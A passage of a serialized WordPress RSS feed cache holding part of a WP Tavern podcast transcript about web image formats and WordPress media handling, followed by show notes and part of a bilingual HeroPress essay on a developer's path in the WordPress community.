kinds of third party CDNs. Jetpack provides an image CDN as one example. Some of them are free, some of them are paid. I think every major CDN has a WordPress plugin that will directly integrate. So you don&#8217;t really have to do much to set it up, maybe put your login or your key in or something. So I would say like, if you can hook up with an image CDN, then you&#8217;re sort of automatically able to take advantage of the latest versions of images.</p>\n\n\n\n<p>[00:26:19] <strong>Nathan Wrigley:</strong> Yeah that sounds like the way to do it, if you can stretch to that. That sounds like the best way because you can just forget about it. Everything will be taken care of.</p>\n\n\n\n<p>[00:26:26] <strong>Adam Silverstein:</strong> Exactly. If you have a reason that you can&#8217;t do it or there&#8217;s a cost associated with it. Your best bet is probably to stick with WebP for now.</p>\n\n\n\n<p>[00:26:31] <strong>Nathan Wrigley:</strong> Right.</p>\n\n\n\n<p>[00:26:32] <strong>Adam Silverstein:</strong> Because that is so widely supported.</p>\n\n\n\n<p>[00:26:33] <strong>Nathan Wrigley:</strong> On that point, are there particular types of images that you would recommend given a certain scenario? So, for example, let&#8217;s say I&#8217;m taking wildlife photography. Fairly specific example, but there&#8217;s an awful lot on the image. There&#8217;s dark areas, light areas. Lots of color. Let&#8217;s say for example, I&#8217;m creating some graphic design and it&#8217;s fairly plain, it&#8217;s text based. There&#8217;s not a lot going on in there. Is there a preferred way in, at least in your mind, or is it always WebP?</p>\n\n\n\n<p>[00:26:58] <strong>Adam Silverstein:</strong> I mean, there are definitely cases where WebP like really performs better, and there&#8217;s cases where JPEG performs almost as well as WebP I guess. And even there are images where the WebP will be slightly larger than the JPEG, in certain cases to get the same quality. You know, I would say certainly if you&#8217;re doing illustration, something that&#8217;s like a line art, then if it could be an SVG, that&#8217;s probably gonna be your most efficient format.</p>\n\n\n\n<p>But other than that, I think probably WebP is gonna win out on average, right? So you can look at specific images and find that maybe one would be better as JPEG, one would be better as WebP. But in general, if you take all your image is an aggregate, you&#8217;re gonna be way better off going with WebP.</p>\n\n\n\n<p>I think the exception to that would be like, is if you are a photographer and what you&#8217;re showing on your website is your photography, and you want it to be like the absolute highest quality. You maybe already have changed the default quality that WordPress uses, and maybe you just want to stick with JPEG so that you know that you&#8217;re getting exactly what you&#8217;re used to. There is a visual difference between JPEG and WebP and, you know, there&#8217;s all these tools that, that they use.</p>\n\n\n\n<p>I talk about it a little bit in my talk about, how do you measure quality? It&#8217;s a very subjective thing actually. There&#8217;s algorithms, so when I&#8217;m talking about how do you measure quality, So let&#8217;s say you take an image and you compress it with a JPEG and then you&#8217;re comparing it to something you&#8217;ve compressed with WebP and you say, oh, the WebP is smaller. That&#8217;s great. But it&#8217;s not that great if also the quality is lower, right? If the quality is the same and the file smaller, you win. But if the file smaller and the quality is degraded, then is that really something you want? So that you have to look at both quality and file size as two parts of the same discussion.</p>\n\n\n\n<p>So it&#8217;s very interesting how we think about quality. I think, I have a slide in my talk where I have two images and there are very different compression qualities, but you actually can&#8217;t tell the difference on the screen because it&#8217;s blurry and you&#8217;re looking at a screen from 30 feet away. And the point is that it matters, the context where you&#8217;re gonna be viewing that matters. If it&#8217;s a little thumbnail, you&#8217;re not going to really matter if it&#8217;s like some pixels that are off. But if you&#8217;re looking at like that big gorgeous wildlife photography and you&#8217;re a photographer, you want the best possible quality.</p>\n\n\n\n<p>[00:28:57] <strong>Nathan Wrigley:</strong> I guess it&#8217;s a case by case basis, isn&#8217;t It?</p>\n\n\n\n<p>[00:29:00] <strong>Adam Silverstein:</strong> It is.</p>\n\n\n\n<p>[00:29:02] <strong>Nathan Wrigley:</strong>Just suddenly occurred to me that we didn&#8217;t talk about how WordPress deals with images. We have the media library. I would imagine that&#8217;s how most people interact with their images on WordPress. You go into the media library and you upload things, drag them in and what have you. But there&#8217;s all sorts of wizardry going on right at that moment where you pull the image in for the first time. And, potentially people listening to this, they won&#8217;t know about that. So.</p>\n\n\n\n<p>[00:29:20] <strong>Adam Silverstein:</strong> Sure.</p>\n\n\n\n<p>[00:29:21] <strong>Nathan Wrigley:</strong> Are you able to run through that quickly?</p>\n\n\n\n<p>[00:29:22] <strong>Adam Silverstein:</strong> Sure, so when you upload your image to WordPress. You&#8217;re uploading your original image, and then WordPress is gonna create a series of subsidized images. By default it has I think four, it&#8217;s actually six sizes built in. Four that you can see in the settings, or three that you can see in the settings screens. Thumbnail, medium and large. There&#8217;s also a medium large size that we added. And then there&#8217;s also two HDMI, high definition screen sizes, that are like even larger than the large size.</p>\n\n\n\n<p>So when you upload your image, WordPress will go through this kind of crunching phase where it generates all of these subsidized images, and then those can be used later on the front end, depending on your context. So if it&#8217;s a thumbnail image, it&#8217;s gonna use that really small image. If it&#8217;s a larger image, it&#8217;ll use the larger one.</p>\n\n\n\n<p>So we sort of pre-create these images when you upload. That process uses, uh, one of two libraries on the backend that tie into your web server. One&#8217;s called LibGD, which is now built into php. And the other one&#8217;s called ImageMagick, or people call it Image Magic. That&#8217;s like the GUI for it. And both of those libraries are available in WordPress.</p>\n\n\n\n<p>We have built in image handling classes for them. I will say you can also extend the image library to add your own image handling class, but I&#8217;m not aware of specific implementations. But those are sort of the two that we support out of the box. And they&#8217;re very popular and common in php. Like I said, GD&#8217;s built into php now.</p>\n\n\n\n<p>Those libraries may or may not support different formats. So getting back to your question of which format is supported. In order to be able to use AVIF with WordPress, we really need that server support. because if the server can&#8217;t read AVIF, if that means when you upload an AVIF file or you upload a JPEG and you&#8217;re trying to output AVIF, it can&#8217;t do that.</p>\n\n\n\n<p>It doesn&#8217;t know how to do that. So until we get to PHP 8.1, which supports AVIF, we&#8217;re probably not going to be able to support directly AVIF in WordPress. So there&#8217;s that server dependency that you have. And also, just to add a little wrinkle to that is that, GD supports WebP or, you know, Imagemagick supports AVIF, but only if it&#8217;s built with that. So literally at compile time, someone has to build the web server, right? It&#8217;s written in C or whatever assembly, like whatever code it&#8217;s written in, and then someone has to compile and they have to decide, am I including the AVIF i library? Am I including the WebP library? And so whether you have support for those depends on your host.</p>\n\n\n\n<p>Like what is their hosting stack, what is the distribution that they&#8217;re using? It&#8217;s a wide variety of things out there. But yeah, that&#8217;s the general process. You upload, the images get generated, and then, when you insert the image into your post WordPress will use all of those images. They&#8217;ll use it in the source set to build out the responsive design.</p>\n\n\n\n<p>[00:31:48] <strong>Nathan Wrigley:</strong> As with all things WordPress there&#8217;s plugins that step in and do additional features. I mean you can code this yourself but you know, you can create other image sizes that WordPress will create on the fly, soon as you, you know, you crunch an image. Yeah, but also there&#8217;s this curious third party industry of image s smushing, I want to call it. You know where, when it&#8217;s uploaded, and I believe also WordPress itself now has a maximum, you know, if you&#8217;ve got a vanilla install of WordPress there&#8217;s a, what is it? What&#8217;s the.</p>\n\n\n\n<p>[00:32:15] <strong>Adam Silverstein:</strong> It&#8217;s It&#8217;s like a max threshold size for image uploads.</p>\n\n\n\n<p>[00:32:18] <strong>Nathan Wrigley:</strong> Yeah. That, I suppose is a useful thing to talk about. The idea that, okay, so you&#8217;ve got this brand new beautiful camera, which is taking images.</p>\n\n\n\n<p>[00:32:27] <strong>Adam Silverstein:</strong> Sixteen megapixels.</p>\n\n\n\n<p>[00:32:27] <strong>Nathan Wrigley:</strong> Right, and honestly you&#8217;ve got a 10 megabyte image but you&#8217;re intending to display it as a thumbnail in the corner of your post or something like that.</p>\n\n\n\n<p>[00:32:34] <strong>Adam Silverstein:</strong> Right?</p>\n\n\n\n<p>[00:32:35] <strong>Nathan Wrigley:</strong> The intention, therefore, from these third party plugins and, and what have you, is to take that image and just reduce it. Make it teeny tiny. Why do we do that? What&#8217;s the benefit to begin there? You talked about bandwidth and all of that earlier. Is that the only reason that we&#8217;re doing, it&#8217;s just to save on bandwidth?</p>\n\n\n\n<p>[00:32:52] <strong>Adam Silverstein:</strong> And to speed up the loading of the page.</p>\n\n\n\n<p>[00:32:53] <strong>Nathan Wrigley:</strong> Right.</p>\n\n\n\n<p>[00:32:54] <strong>Adam Silverstein:</strong> So, and just to Expand on that. It&#8217;s not really just about the speed of the page, but it&#8217;s about the experience of your users visiting your website. If you have slow images that are too large for what you need, then you are giving your users a poor experience. There&#8217;s all kinds of studies that show that by improving the loading time and responsiveness of your website, you get better results. So whatever those goals may be, conversions into newsletter subscribers or people who purchase products, or someone who reads more than one article on your website. Those things are all enhanced by having a better user experience. And so if we&#8217;re talking about optimizing images, we&#8217;re really talking about creating a better user experience.</p>\n\n\n\n<p>[00:33:33] <strong>Nathan Wrigley:</strong> You&#8217;re wearing your Google t-shirt today.</p>\n\n\n\n<p>[00:33:35] <strong>Adam Silverstein:</strong> Yeah.</p>\n\n\n\n<p>[00:33:35] <strong>Nathan Wrigley:</strong> So you know you&#8217;re doing all all the right things.</p>\n\n\n\n<p>[00:33:37] <strong>Adam Silverstein:</strong> Google google loves open source.</p>\n\n\n\n<p>[00:33:39] <strong>Nathan Wrigley:</strong> You are not on the search team, so maybe this question is not gonna be one that&#8217;s right in your wheelhouse, but I&#8217;m gonna ask it anyway. SEO and search engine results. I&#8217;m presuming there is a benefit because you know, in the last couple of years we&#8217;ve all been thinking about Core Web Vitals and that&#8217;s been a big push from Google, and everybody&#8217;s taken that very seriously.</p>\n\n\n\n<p>[00:33:56] <strong>Adam Silverstein:</strong> Yes.</p>\n\n\n\n<p>[00:33:56] <strong>Nathan Wrigley:</strong> And, you know, is there a benefit to your search position, should you take the time to do images right?</p>\n\n\n\n<p>[00:34:04] <strong>Adam Silverstein:</strong> Yes, and I&#8217;ll say that it&#8217;s only really a very small benefit. Really what gets you the best position in search results is having the best content. And if I have an article about Bartlett pears growing in San Diego and someone Googles it, and I&#8217;m the only article about that on the web, they&#8217;re gonna go right to me. No matter how performant my site is. Where performance comes in is as a waiting factor, like many, many other factors as a signal to Google. Just like HTTPS, mobile support. These are all signals that Google has announced.</p>\n\n\n\n<p>But, uh, you&#8217;re not gonna be like, penalized for poor performance. It&#8217;s more that if all other things are equal, this could be a weighting factor that would bump you up, having a better experience for your users. But that really shouldn&#8217;t be your motivation. Your motivation should be creating a better experience for your users first, and then secondly better achieving your goals once people reach your site.</p>\n\n\n\n<p>So someone described it as a funnel, right? People think of web conversions as a funnel. You start at the top, all the people who see your search results, and then it gets smaller. All the people who click on your search results. And then, all the people who actually do something on your website. And then finally, this tiny, small number of people that convert to being paying customers. And I, and in my hands here just for audio, I&#8217;m going from wide to smaller. And where the user experience parts helps, uh, improving user pitch is not up here at the top in getting more search results. It&#8217;s here where once users reach your site, then you&#8217;re gonna really see that benefit. And so, that&#8217;s where you should think about where the benefit comes. It comes from turning those visiting users into actual, whatever your goal is.</p>\n\n\n\n<p>[00:35:36] <strong>Nathan Wrigley:</strong> Okay, I&#8217;m gonna go slightly off piste. Google does a fantastic job. I use Google photos, and Google Photos is able to identify the objects in my photos. And so I did wonder if there was a potential Google search. So, for example if I have a website I don&#8217;t label, I don&#8217;t put any metadata on my images at all. Does Google do any of that? This website is full of trees, and so if I search for a particular tree.</p>\n\n\n\n<p>[00:36:05] <strong>Adam Silverstein:</strong> That&#8217;s a really good question. I don&#8217;t know the answer. I would say, first of all, please put alt tags on your images. Don&#8217;t do that. Because there&#8217;s a reason we have alt tags. Actually someone, so it&#8217;s the reason, the big reason is of course, accessibility, right. People who are visually impaired can&#8217;t see your images. It&#8217;s nice if they have a description of what they&#8217;re missing.</p>\n\n\n\n<p>Someone actually today came by and said, do you think there&#8217;s a way we could take image recognition and make it so that non sighted users touch over the image, they get a description of what they&#8217;re seeing. So, if you&#8217;re a non sight user, I don&#8217;t know if you&#8217;ve ever seen people, a lot of times they actually use a touchscreen that&#8217;s haptic.</p>\n\n\n\n<p>[00:36:37] <strong>Nathan Wrigley:</strong> Yeah.</p>\n\n\n\n<p>[00:36:38] <strong>Adam Silverstein:</strong> So they can move over and they can feel the buttons, right. It&#8217;s not just, having the buttons described to them in text, but literally a screen that as you&#8217;re moving over elements of the page, it bumps up. So you can actually feel, oh, there&#8217;s a button. That&#8217;s where the home button is, and then they can tap it, right? So they already have this technology, screens that are like this, and of course visually impair people are, are often used to reading braille, so they&#8217;re very sensitive with their fingers.</p>\n\n\n\n<p>So imagine something where you have a picture of trees and a person and a visually impaired person could move their hand over and say like, oh, there&#8217;s the person and there&#8217;s trees back here, and they&#8217;re feeling the image. Like that would be amazing. And that would again, require that same visual recognition of images.</p>\n\n\n\n<p>[00:37:12] <strong>Nathan Wrigley:</strong> That is a truly, astonishingly good idea.</p>\n\n\n\n<p>[00:37:14] <strong>Adam Silverstein:</strong> Right, I had never heard that idea.</p>\n\n\n\n<p>[00:37:16] <strong>Nathan Wrigley:</strong> That is just mind blowingly clever. Let&#8217;s hope that somebody can build that.</p>\n\n\n\n<p>[00:37:21] <strong>Adam Silverstein:</strong> Yeah. There was another, just one more that someone posted recently to Twitter, you might have seen, but it&#8217;s the, it&#8217;s like the DALL E tools that are out now with the image generation. So someone has built a WordPress plugin in Gutenberg where you type in, like you&#8217;re working on your post and it&#8217;s about Bartlett pears in San Diego. So you type in like Bartletts flying across the San Diego Bay, and it generates an image for you of that. You&#8217;re there in Gutenberg and you just insert it.</p>\n\n\n\n<p>[00:37:45] <strong>Nathan Wrigley:</strong> The whole AI piece. Rewind the clock just two years, and I thought it was, no, this is going nowhere.</p>\n\n\n\n<p>[00:37:51] <strong>Adam Silverstein:</strong> Right.</p>\n\n\n\n<p>[00:37:51] <strong>Nathan Wrigley:</strong> At no point in the future will you be able to tell a computer to create an image or a piece of art, or replicate, well, almost anything, but especially the things which don&#8217;t exist. You know, the triangle dog or whatever it might be.</p>\n\n\n\n<p>[00:38:04] <strong>Adam Silverstein:</strong> Yeah.</p>\n\n\n\n<p>[00:38:05] <strong>Nathan Wrigley:</strong> And, and yet you input it in and just in the space of two years, it&#8217;s gone me laughing at it. To me, just being in awe of it.</p>\n\n\n\n<p>[00:38:13] <strong>Adam Silverstein:</strong> It&#8217;s amazing.</p>\n\n\n\n<p>[00:38:14] <strong>Nathan Wrigley:</strong> It&#8217;s truly amazing.</p>\n\n\n\n<p>[00:38:15] <strong>Adam Silverstein:</strong> Yeah, so I use one of those tools to generate all the images in my slideshow for my presentation yesterday. So I have like hilarious images, like a raccoon surf boarding and a, a goat driving a race car.</p>\n\n\n\n<p>[00:38:25] <strong>Nathan Wrigley:</strong> Yeah.</p>\n\n\n\n<p>[00:38:26] <strong>Adam Silverstein:</strong> Impossible things, but they look, you know, if you look closely, you can see some weird details. They&#8217;re very, very accurate.</p>\n\n\n\n<p>[00:38:32] <strong>Nathan Wrigley:</strong> There&#8217;s lots of them as well. I believe the one that captured my attention recently, I think it was called Mind Journey or something like. It&#8217;s implementation is to create art.</p>\n\n\n\n<p>[00:38:43] <strong>Adam Silverstein:</strong> Right.</p>\n\n\n\n<p>[00:38:43] <strong>Nathan Wrigley:</strong> So you give it the, the thing that you feed it is, I don&#8217;t know, I&#8217;d like a picture of a sunset that resembles Rembrandt, with a red sky to the left and so on. And it completely does it.</p>\n\n\n\n<p>[00:38:54] <strong>Adam Silverstein:</strong> That&#8217;s amazing.</p>\n\n\n\n<p>[00:38:54] <strong>Nathan Wrigley:</strong> Yeah, an absolute miracle. Adam Silverstein, thank you so much for joining me on the podcast today. I really appreciate it.</p>\n\n\n\n<p>[00:39:00] <strong>Adam Silverstein:</strong> It was fun. Thank you.</p>\n</div>\n\n\n\n<p>On the podcast today we have <a href=\"https://profiles.wordpress.org/adamsilverstein/\">Adam Silverstein</a>.</p>\n\n\n\n<p>Adam is a WordPress core comitter where he works to fix bugs and improve modern web capabilities. As a Developer Relations Engineer in the content ecosystem team at Google, he works to invigorate the open web by empowering and educating developers.</p>\n\n\n\n<p>At the recent WordCamp US, he gave a presentation entitled ‘Images on the Web &#8211; past present and future’. In it, he outlined his thoughts on where the web is going in terms of support for different image formats.</p>\n\n\n\n<p>Alongside text, images are the bedrock of webpages. We browse the internet and expect pages to have images of all forms. Photos, illustrations, charts and images to convey additional meaning to the text.</p>\n\n\n\n<p>But how do the images actually get on the page? WordPress makes handling images pretty easy, and Adam explains what happens when you upload an image to the Media Library, and then display it on a page or post in a browser.</p>\n\n\n\n<p>We discuss the fact that different image sizes are created automatically by WordPress, which can be used in a variety of contexts across your website. You’ve likely heard of many of them, but perhaps you have not thought about which format belongs where.</p>\n\n\n\n<p>As with code, the technology behind images does not stand still. New formats are being created all the time and are being supported at differing rates by the major browser vendors. In the past we typically used JPEG, GIF or PNG files to display images on our websites, but there’s good reason to think about adopting other defaults in the near future.</p>\n\n\n\n<p>We discuss some of these new formats, such as WebP, AVIF and JPEG XL, and find out about how they are speeding up website loading times because of their smaller file sizes.</p>\n\n\n\n<p>We also get into how you can optimise your images, and how plugins and SaaS solutions can reduce the size of your files before or after you upload them to your WordPress install.</p>\n\n\n\n<p>Adam has some good advice about a topic which is becoming increasingly important, page load time, and if you’ve never given this serious thought, this is a great podcast episode for you.</p>\n\n\n\n<p>Typically, when we record the podcast, there’s not a lot of background noise, but that’s not always the case. Over the coming weeks, I’ll be bringing you recordings from a recent trip to WordCamp US 2022, and you might notice that the recordings have a little echo or other strange audio artefacts. Whilst the podcasts are more than listenable, I hope you understand that the vagaries of the real world were at play.</p>\n\n\n\n<h2>Useful links.</h2>\n\n\n\n<p><a href=\"https://wptavern.com/podcast/34-felix-arntz-on-wordpress-and-performance\">Jukebox Podcast episode 34 – Felix Arntz on WordPress and Performance</a></p>\n\n\n\n<p><a href=\"https://caniuse.com/\">Can I Use website</a></p>\n\n\n\n<p><a href=\"https://libgd.github.io/\">LibGD graphics library</a></p>\n\n\n\n<p><a href=\"https://wptavern.com/new-block-diffusion-plugin-creates-ai-generated-images-from-text-prompts\">New Block Diffusion Plugin Creates AI-Generated Images from Text Prompts</a></p>\n\n\n\n<p><a href=\"https://www.midjourney.com/home/\">Midjourney</a></p>\";s:7:\"attribs\";a:0:{}s:8:\"xml_base\";s:0:\"\";s:17:\"xml_base_explicit\";b:0;s:8:\"xml_lang\";s:0:\"\";}}s:7:\"pubDate\";a:1:{i:0;a:5:{s:4:\"data\";s:31:\"Wed, 19 Oct 2022 14:00:00 +0000\";s:7:\"attribs\";a:0:{}s:8:\"xml_base\";s:0:\"\";s:17:\"xml_base_explicit\";b:0;s:8:\"xml_lang\";s:0:\"\";}}}s:32:\"http://purl.org/dc/elements/1.1/\";a:1:{s:7:\"creator\";a:1:{i:0;a:5:{s:4:\"data\";s:14:\"Nathan Wrigley\";s:7:\"attribs\";a:0:{}s:8:\"xml_base\";s:0:\"\";s:17:\"xml_base_explicit\";b:0;s:8:\"xml_lang\";s:0:\"\";}}}}}i:7;a:6:{s:4:\"data\";s:13:\"\n	\n	\n	\n	\n	\n	\n\";s:7:\"attribs\";a:0:{}s:8:\"xml_base\";s:0:\"\";s:17:\"xml_base_explicit\";b:0;s:8:\"xml_lang\";s:0:\"\";s:5:\"child\";a:2:{s:0:\"\";a:5:{s:5:\"title\";a:1:{i:0;a:5:{s:4:\"data\";s:69:\"HeroPress: Making The World A Better Place One Line Of Code At A Time\";s:7:\"attribs\";a:0:{}s:8:\"xml_base\";s:0:\"\";s:17:\"xml_base_explicit\";b:0;s:8:\"xml_lang\";s:0:\"\";}}s:4:\"guid\";a:1:{i:0;a:5:{s:4:\"data\";s:56:\"https://heropress.com/?post_type=heropress-essays&p=4906\";s:7:\"attribs\";a:0:{}s:8:\"xml_base\";s:0:\"\";s:17:\"xml_base_explicit\";b:0;s:8:\"xml_lang\";s:0:\"\";}}s:4:\"link\";a:1:{i:0;a:5:{s:4:\"data\";s:190:\"https://heropress.com/essays/making-the-world-a-better-place-one-line-of-code-at-a-time/#utm_source=rss&utm_medium=rss&utm_campaign=making-the-world-a-better-place-one-line-of-code-at-a-time\";s:7:\"attribs\";a:0:{}s:8:\"xml_base\";s:0:\"\";s:17:\"xml_base_explicit\";b:0;s:8:\"xml_lang\";s:0:\"\";}}s:11:\"description\";a:1:{i:0;a:5:{s:4:\"data\";s:16606:\"<img width=\"1024\" height=\"512\" src=\"https://heropress.com/wp-content/uploads/2023/10/101922-min.jpg\" class=\"attachment-large size-large wp-post-image\" alt=\"Pull Quote: Making The World A Better Place One Line Of Code At A Time. Hacer Del Mundo Un Lugar Mejor Una Linea De Codigo A La Vez\" />\n<p><a href=\"https://heropress.com/feed/#espanol\">Este ensayo también está disponible en español.</a></p>\n\n\n\n<h2 class=\"kt-adv-heading_956780-cb wp-block-kadence-advancedheading\"><strong>How I Met WordPress</strong></h2>\n\n\n\n<p>It seems like only yesterday that I thought to myself&#8230; There have to be a better way to do this? At that time I was working as a designer for a company dedicated to sports and we were working internally on a kind of CMS to digitize our Football News magazine, but the result was horrendous, the interface did not exist, it constantly crashed and it was full of bugs.</p>\n\n\n\n<p>That&#8217;s how in the year 2008-2009 in an Internet search I discovered WP, its version at that time 2.5, I couldn&#8217;t get us to use WP as a CMS and the internal solution won. But there was one seed planted.</p>\n\n\n\n<p>At that time I used WordPress in a very simple way, my background was a graphic designer, I didn&#8217;t know anything about PHP, much less about programming, but studying the WP code I was able to make my first themes, which by the way were terrible.</p>\n\n\n\n<p>I learned HTML and CSS, at the same time I started taking Programming courses, especially in PHP, and that&#8217;s how I started this adventure.</p>\n\n\n\n<p>The first years were literally learning on my own, in my bubble, then I started to add the word web developer in my resume, I found a job in a company as a designer and web master, I designed gif banners, magazine ads, brochures and the website , this company had its page in ASP and since it was very complicated to update it, at least for me, I gave myself the task of migrating it to WordPress, it was 2014 and WP was in version 3.9, this was my first job in which I did everything from the design to the development and programming of the theme, in it I put into practice everything I had learned until then.</p>\n\n\n\n<h2 class=\"kt-adv-heading_d7c6c7-b7 wp-block-kadence-advancedheading\"><strong>Community</strong></h2>\n\n\n\n<p>In 2016, I met Roberto Remedios, my tattoo artist who was also his tattoo artist, told him that if didn&#8217;t know me?, Costa Rica is a small country where one way or another we all have friends in common, he told him that my passion was WordPress, when we met we didn&#8217;t stop talking about how cool it was, but what caught my attention the most was the word Community.</p>\n\n\n\n<p><strong>Community </strong>what was that?, I had spent so many years working on my own that I didn&#8217;t know that it even existed, my concept of Open Source was simply something free.</p>\n\n\n\n<p>Roberto convinced me that same year to go to WordCamp Miami, it was my first camp, meeting the community behind WP was something that impressed me a lot, the talks, the desire to teach and learn from all the participants, and above all to collaborate with the community, wow everything changed for me.</p>\n\n\n\n<p>When we got back, Roberto and I started talking about the possibility of holding a WordCamp in San José, Costa Rica.</p>\n\n\n\n<p>Part of that process is giving talks before the camp as a way to promote it, and as a member of the newly founded WordPress Costa Rica group, it was time for me to give a talk. It was the first time I spoke in front of the public since my student days, I remember how nervous I was, my talk revolved around page builders, there was no Gutenberg back then, I managed to get the Meetup sponsored, there were snacks, swags, A lot of people came, it was incredible. Colleagues who participated that day in that Meetup, are still an active part of the community.</p>\n\n\n\n<p>I gave that same talk at WordCamp and it was even more stressful, because my computer did not turn on, at that moment they lent me a computer, but oh surprise I could not run my test site, after 20min I was able to solve the problem, the JavaScript was disabled. I was already sweating profusely, red with shame, in the end I was able to give the talk and everything ended well.</p>\n\n\n\n<p>WordCamp San Jose, it was incredible, it was hard work, very rewarding, it was a success, never before had I felt so good professionally, years had passed, without sharing something that I like so much with anyone, suddenly we had a community, we meet regularly, and share about what we are most passionate about.</p>\n\n\n\n<p>Recently my talks revolve around making my local community aware of new WordPress trends, I collaborate as an administrator of the WordPress Costa Rica group.</p>\n\n\n\n<h2 class=\"kt-adv-heading_fdbe32-4a wp-block-kadence-advancedheading\"><strong>Outside Costa Rica</strong></h2>\n\n\n\n<p>The second year that I attended WordCamp Miami, I participated as a volunteer, and I had the opportunity to interact with many of the humans that I follow on social media, and then I was encouraged to send talks and participate in the WordCamps that take place in my region. Eager to share what I have learned, to date I have participated as a volunteer, speaker, and organizer in my city Costa Rica, Nicaragua, Mexico and in the first Central American WordCamp which was held online.</p>\n\n\n\n<p>Then came the talks in another language, I have had the opportunity to give talks in Rome, Italy, I participated as a volunteer in the WordCamp US, where I had the opportunity to meet colleagues and the CEO of a company that I admire a lot, this was in Nashville , U.S. seeing colleagues with whom I have had the privilege of working today, my circle of friends expanded.</p>\n\n\n\n<p>Also had participate in online conferences, such as <a href=\"https://www.youtube.com/watch?v=B33I2bvt6TQ\">GatsbyConf</a>, <a href=\"https://javascriptforwp.com/talks/gatsby-wordpress-alfredo-navas-fernandini/\">JavaScript For WordPress</a> and at <a href=\"https://europe.wordcamp.org/2021/session/headless-wordpress- gatsby-or-nextjs/\">WordCamp EU 2021</a>.</p>\n\n\n\n<p>I like to share and talk about JAMStack, especially with GatsbyJS and WordPress as a headless CMS.</p>\n\n\n\n<h2 class=\"kt-adv-heading_aa6505-fd wp-block-kadence-advancedheading\"><strong>Professional Path</strong></h2>\n\n\n\n<p>I have a lot to thank WordPress for, the first thing it brought was the curiosity to learn programming, then remote work. I started working for an agency located in Austin, Texas, with several collaborators in Costa Rica, it was the year 2017, they hired me for my knowledge in WordPress, it was not only the first time that I could work completely dedicated to WP, but also from my house, I never set foot in an office again, seeing my children grow up and above all working in flip flops.</p>\n\n\n\n<p>That same year, together with my wife, we founded a small specialized WordPress agency, which we still have and is managed by her. Our most recent work was the website for <a href=\"https://premiosacam.com/\">Costa Rican Music Awards</a>.</p>\n\n\n\n<h2 class=\"kt-adv-heading_e72b3f-d5 wp-block-kadence-advancedheading\"><strong>Expanding my Career</strong></h2>\n\n\n\n<p>I decided to pay attention to the Job Boards that you find when you go to a WordCamp, I was looking for the opportunity to work on larger projects, corporate projects where Icould expand my knowledge, I started applying, I was convinced that I had the level to work in a dedicated agency 100 % to WordPress.</p>\n\n\n\n<p>I worked for agencies in New York and DC but I was still searching for a place to really fit, and the opportunity came, with perseverance and effort today I work as a Senior Frontend Engineer, in the agency that I most admire, WebDevStudios, dedicated 100% to WordPress.</p>\n\n\n\n<p>WordPress definitely changed my life personally and professionally, I have met incredible people and places, above all I have been able to give time and a quality life to my family, I have learned a lot, and still learning, I write about WordPress, I help my community teaching about the tools with which they can carry out their ideas.</p>\n\n\n\n<p>And I am doing what I love the most, making the world a better place one line of code at a time.</p>\n\n\n\n<hr class=\"wp-block-separator has-alpha-channel-opacity\" />\n\n\n\n<p>&nbsp;</p>\n\n\n\n<h1 id=\"espanol\" class=\"kt-adv-heading_68c620-ba wp-block-kadence-advancedheading\">Hacer Del Mundo Un Lugar Mejor Una Linea De Codigo A La Vez</h1>\n\n\n\n<h2 class=\"kt-adv-heading_c92a36-80 wp-block-kadence-advancedheading\"><strong>Como Conoci WordPress</strong></h2>\n\n\n\n<p>Parece que fue ayer cuando me dije a mi mismo&#8230; <strong>¿T</strong>iene que haber una mejor manera de hacer esto? En ese entonces me desempeñaba como diseñador para una empresa dedicada a los deportes y estábamos trabajando internamente en una especie de CMS para digitalizar nuestra revista Football News, pero el resultado era horrendo, la interface inexistente, se caía constantemente y estaba lleno de bugs.</p>\n\n\n\n<p>Fue así como en el año 2008-2009 en una busqueda en la Internet descubrí WP, su versión en ese entonces 2.5, no logre que usaramos WP como CMS y la solución interna gano. Pero habia quedado una semillla,</p>\n\n\n\n<p>En ese entonces usaba WordPress de una manera muy simple, mi background era disenador grafico, no sabía nada de PHP, mucho menos de programación, pero estudiando el código de WP pude hacer mis primeros temas, que por por cierto eran terribles.</p>\n\n\n\n<p>Aprendi HTML, y CSS, al tiempo empece a llevar cursos de Programacion, sobre todo en PHP y así inicio esta aventura.</p>\n\n\n\n<p>Los primero años fueron literalmente aprendiendo por mi cuenta, en mi burbuja, luego empeze a agregar la palabra desarrollador web en mi curriculum, encontre trabajo en una empresa como diseñador y web master, diseñaba gif banners, anucios para revista, brochures y la pagina web, esta empresa tenia su pagina en ASP y como era muy complicado actualizarla, al menos para mi, me di la tarea de migrarla a WordPress, era el 2014 y WP estaba en us version 3.9, este fue mi primer trabajo en cual hice todo desde el diseño hasta el desarrollo y programacion del tema, en el puse en practica todo lo que habia aprendido hasta ese entonces.</p>\n\n\n\n<h2 class=\"kt-adv-heading_6b09c6-ce wp-block-kadence-advancedheading\"><strong>Comunidad</strong></h2>\n\n\n\n<p>Y la vida siguio su rumbo y en el año 2016, conoci a Roberto Remedios, Mi tatuador que era a la vez su tatuador, le decia que <strong>¿S</strong>i no me conocia?, Costa Rica es un pais pequeño donde de alguna u otra forma todos tenemos amigos en comun, el le comentaba que mi pasion era WordPress, cuando nos conocimos no paramos de</p>\n\n\n\n<p>hablar sobre lo cool que era, pero lo que mas me llamo la atencion era la palabra Comunidad.</p>\n\n\n\n<p><strong>¿</strong>Comunidad que era eso?, habia pasado tantos años trabajando por mi cuenta que no sabia que eso si quiera existia, mi concepto de Open Source era simplemente algo gratis.</p>\n\n\n\n<p>Roberto me convencio ese mismo año de ir WordCamp Miami, fue mi primer camp, conocer la comunidad que había detrás de WP fue algo que me impresionó mucho, las charlas, las ganas de enseñar y de aprender de todos los participantes, y sobre todo colaborar con la comunidad, wow todo cambio para mi.</p>\n\n\n\n<p>Cuando regresamos Roberto y yo empezamos a conversar sobre la posibilidad de hacer un WordCamp en San José, Costa Rica.</p>\n\n\n\n<p>Parte de ese proceso es dar charlas antes del camp como una forma de promoverlo, y como miembro del recién fundado grupo de WordPress Costa Rica, me llego el momento de dar una charla. Era la primera vez que hablaba frente al publico desde mis tiempos de estudiante, recuerdo lo nervioso que estaba, mi charla giraba en torno a los page builders, no había gutenberg en ese entonces, logre que el Meetup fuera patrocinado, habian snacks, swags, llego bastante gente, fue increible. Colegas que participaron ese día en ese Meetup, aun forman parte activa de la comunidad.</p>\n\n\n\n<p>Esa misma charla la imparti en el WordCamp y fue aún más estresante, pues mi computador no encendió, en ese momento me prestaron una computadora, pero oh sorpresa no podía correr mi sitio de prueba, después de 20min pude solucionar el problema, el JavaScript estaba desactivado. ya sudaba a mares, rojo de la vergüenza, al final pude dar la charla y todo termino bien.</p>\n\n\n\n<p>WordCamp San Jose, 